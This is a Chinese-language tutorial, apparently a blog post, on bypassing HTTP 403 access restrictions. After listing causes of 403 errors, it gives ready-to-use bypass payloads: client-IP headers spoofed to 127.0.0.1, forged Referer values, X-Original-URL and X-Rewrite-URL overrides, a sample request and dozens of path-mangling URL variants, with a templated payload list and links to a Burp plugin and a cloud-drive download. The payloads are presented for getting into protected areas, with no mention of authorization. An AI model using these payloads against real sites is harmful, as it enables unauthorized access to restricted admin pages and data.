在瀏覽網(wǎng)站的時(shí)候，經(jīng)常會(huì)遇到403的狀態(tài)碼，表示不允許訪問(wèn)。該狀態(tài)表示服務(wù)器理解了本次請(qǐng)求但是拒絕執(zhí)行該任務(wù)，該請(qǐng)求不該重發(fā)給服務(wù)器。指的是服務(wù)器端有能力處理該請(qǐng)求，但是拒絕授權(quán)訪問(wèn)。

這就意味著這里面有東西，我們只需繞過(guò)它。

造成403的原因

先來(lái)看看造成403可能得原因有哪些？

1、你的IP被列入黑名單。

2、你在一定時(shí)間內(nèi)過(guò)多地訪問(wèn)此網(wǎng)站(一般是用采集程序)，被防火墻拒絕訪問(wèn)了。

3、網(wǎng)站域名解析到了空間，但空間未綁定此域名。

4、你的網(wǎng)頁(yè)腳本文件在當(dāng)前目錄下沒(méi)有執(zhí)行權(quán)限。

5、在不允許寫/創(chuàng)建文件的目錄中執(zhí)行了創(chuàng)建/寫文件操作。

6、以http方式訪問(wèn)需要ssl連接的網(wǎng)址。

7、瀏覽器不支持SSL 128時(shí)訪問(wèn)SSL 128的連接。

8、在身份驗(yàn)證的過(guò)程中輸入了錯(cuò)誤的密碼。

9、DNS解析錯(cuò)誤，手動(dòng)更改DNS服務(wù)器地址。

10、連接的用戶過(guò)多，可以過(guò)后再試。

11、服務(wù)器繁忙，同一IP地址發(fā)送請(qǐng)求過(guò)多，遭到服務(wù)器智能屏蔽。

繞過(guò)方式

1）修改user-agent

有的應(yīng)用為了區(qū)分爬蟲(chóng)或者正常請(qǐng)求，會(huì)驗(yàn)證user-agent，看是否瀏覽器發(fā)出的請(qǐng)求。

2）繞過(guò)IP限制

部門網(wǎng)站只允許特定的IP進(jìn)行訪問(wèn)，應(yīng)該會(huì)驗(yàn)證客戶端的IP，如果不是規(guī)定的IP，則會(huì)返回403。

可以通過(guò)下面的方式繞過(guò)：

X-Originating-IP: 127.0.0.1


X-Remote-IP: 127.0.0.1


X-Client-IP: 127.0.0.1


X-Forwarded-For: 127.0.0.1


X-Forwared-Host: 127.0.0.1


X-Host: 127.0.0.1


X-Custom-IP-Authorization: 127.0.0.1

3）修改Referer

網(wǎng)站限制了訪問(wèn)來(lái)源，如果訪問(wèn)來(lái)源不符合，則也會(huì)返回403

繞過(guò)方式：

設(shè)置referer為訪問(wèn)網(wǎng)站的host

4)url覆蓋繞過(guò)

用戶可以使用X-Original-URL或X-Rewrite-URL HTTP請(qǐng)求標(biāo)頭覆蓋請(qǐng)求URL中的路徑，嘗試?yán)@過(guò)對(duì)更高級(jí)別的緩存和Web服務(wù)器的限制。

可以這樣繞過(guò)的原因：有很多的web應(yīng)用，只對(duì)uri地址內(nèi)容進(jìn)行權(quán)限檢查，這就導(dǎo)致uri路徑正常訪問(wèn)之后，我又覆蓋了新的地址，導(dǎo)致403 ByPass

請(qǐng)求包

GET / HTTP/1.1
X-Original-URL: /adminstration
X-Rewrite-URL: /adminstration
Host: www.abc.com
Host: 192.168.56.108

5）擴(kuò)展名繞過(guò)

基于擴(kuò)展名，用于繞過(guò)403受限制的目錄。

site.com/admin => 403


site.com/admin/ => 200


site.com/admin// => 200


site.com//admin// => 200


site.com/admin/* => 200


site.com/admin/*/ => 200


site.com/admin/. => 200


site.com/admin/./ => 200


site.com/./admin/./ => 200


site.com/admin/./. => 200


site.com/admin/./. => 200


site.com/admin? => 200


site.com/admin?? => 200


site.com/admin??? => 200


site.com/admin…;/ => 200


site.com/admin/…;/ => 200


site.com/%2f/admin => 200


site.com/%2e/admin => 200


site.com/admin%20/ => 200


site.com/admin%09/ => 200


site.com/%20admin%20/ => 200

常用payload匯總

$1代表HOSTNAME

$2代表PATH

$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
* $1/./$2/./
$1/$2anything -H "X-Original-URL: /$2" 
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" 
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/

常用工具

BurpSuite插件 403Bypasser：可以在burp擴(kuò)展商店安裝

BurpSuite插件 BurpSuite_403Bypasser

項(xiàng)目地址：https://github.com/sting8k/BurpSuite_403Bypasser

網(wǎng)盤下載鏈接：https://pan.quark.cn/s/f164943c749b